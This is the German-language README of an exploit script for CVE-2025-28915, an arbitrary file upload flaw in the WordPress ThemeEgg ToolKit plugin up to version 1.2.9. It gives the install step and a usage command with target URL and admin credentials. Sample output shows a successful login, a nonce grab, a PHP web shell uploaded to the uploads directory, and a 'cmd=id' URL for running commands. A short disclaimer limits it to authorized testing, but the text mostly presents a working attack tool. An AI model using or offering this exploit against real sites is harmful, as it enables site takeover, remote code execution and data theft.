
WordPress ThemeEgg ToolKit Plugin <= 1.2.9 - Schwachstelle für beliebigen Datei-Upload
Eine Schwachstelle für uneingeschränkte Datei-Uploads im ThemeEgg ToolKit-Plugin für WordPress (Versionen ≤ 1.2.9) ermöglicht authentifizierten Angreifern das Hochladen von Web-Shells auf den Server. Dies kann zu Remote-Code-Ausführung (RCE), vollständiger Übernahme der Website und Kompromittierung sensibler Daten führen.
Dieses Skript automatisiert die Ausnutzung von CVE-2025-28915 durch:
requests, beautifulsoup4pip install requests beautifulsoup4
python CVE-2025-28915.py -u http://192.168.100.74:888/wordpress -un admin -p password123
| Argument | Beschreibung |
|---|---|
-u | Ziel-WordPress-URL (z.B. http://target.com/wordpress) |
-un | WordPress-Benutzername |
-p | WordPress-Passwort |
[+] Vulnerable version detected: 1.2.9
[+] Logged in successfully.
[+] Found security nonce: f82467a997
[*] Uploading Web Shell...
[+] Web Shell uploaded successfully!
[+] Potential Web Shell location: http://target.com/wp-content/uploads/2025/03/shell.php
[*] Test command: http://target.com/wp-content/uploads/2025/03/shell.php?cmd=id
Dieses Skript dient nur zu Bildungs- und autorisierten Sicherheitstestzwecken. Unbefugte Nutzung ist illegal und unethisch. Der Autor übernimmt keine Haftung für Missbrauch.
Von: Khaled Alenazi (Nxploit)